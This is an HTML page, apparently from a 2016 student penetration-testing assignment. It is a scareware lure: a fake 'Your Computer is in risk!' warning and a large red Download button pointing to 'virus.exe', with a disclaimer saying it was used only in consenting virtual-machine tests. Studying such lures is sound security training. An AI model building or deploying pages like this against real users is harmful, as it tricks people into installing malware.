


<html>
<head>
  <meta http-equiv="Content-Type"
 content="text/html; charset=iso-8859-1">
  <title>MSSP Assignment</title>
  <link href="web/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
	  .auto-style1 {
		  font-size: large;
		  text-decoration: underline;
	  }
	    
	  .auto-style2 {
		  font-size: xx-large;
		  color: #0e7aa5;
	  }
	  .auto-style3 {
		  font-size: xx-large;
	  }
	  .auto-style4 {
		  border-width: 0px;
	  }
	  .auto-style5 {
		font-size: large;
		color: #FFFFFF;
	}
	.auto-style6 {
		color: #FFFFFF;
	}
	.auto-style7 {
		font-size: large;
	}
</style>
</head>
<body>
<div id="main-wraper">

<div id="banner">	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
<div id="nav">
</div>
</div>
<div id="mid-wraper">
<div id="mid-wraper-innerx">
<div id="right-wraper">
<div class="right-part">

&nbsp;<div style="padding: 10px 0px; width: 596px; float: left;"> 



<h1>Your Computer is in risk! Download the above file to solve the problem!</h1>

</br></br>



	<form method="get" action="virus.exe">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<button style="color:red;font-size:50px;height:100px;width:400px" type="submit">Download!</button>
	</form>





</br></br></br></br>













</div>
	<span class="auto-style1"><span class="auto-style3">Welcome to </span> 
<span class="auto-style2">MSSP Assignment</span></span></div>

<div class="right-part" style="padding: 10px 0px;">
<div style="width: 290px; float: left;">
<h2>About <span class="blue-text">us</span></h2>
<img src="web/small-brd.jpg" alt="" height="3" width="285">
<div
 style="border-right: 1px solid rgb(153, 153, 153); width: 289px; float: left; padding-right: 10px; margin-top: 10px;"> 
	Website designed for assignment purpose only. No copyright infringement 
	intended.<br><br>
	Disclaimers: This email is sent for Education purpose in Project of Penetration Testing only, All scenarios were planned and happened within the closure of Virtual Machines with a permission granted manner by both parties of Attackers and Victims. No physical harm to any sorts of devices nor entities throughout this testing, the test result was documented in detailed and available to review by any parties that AFFECTED by THIS particular penetration testing project upon request, For more inquiries, please contact to kavier26@gmail.com (Developer of this script).
	<br>
<br>
 <br>
<br>

</div>
</div>
</div>
</div>
</div>
<div id="foter">
<div id="foter-inner">
<p style="margin: 0px; padding: 0px; width: 550px; float: left; display: block;">Copyright &copy; 2016 MSSP Assignment. All rights reserved.&nbsp;</p>
<p style="margin: 0px; padding: 0px; width: 200px; float: right; text-align: right; display: block;">Designed by Kavier 
  <!--In partnership with-->
 

</body>
</html>
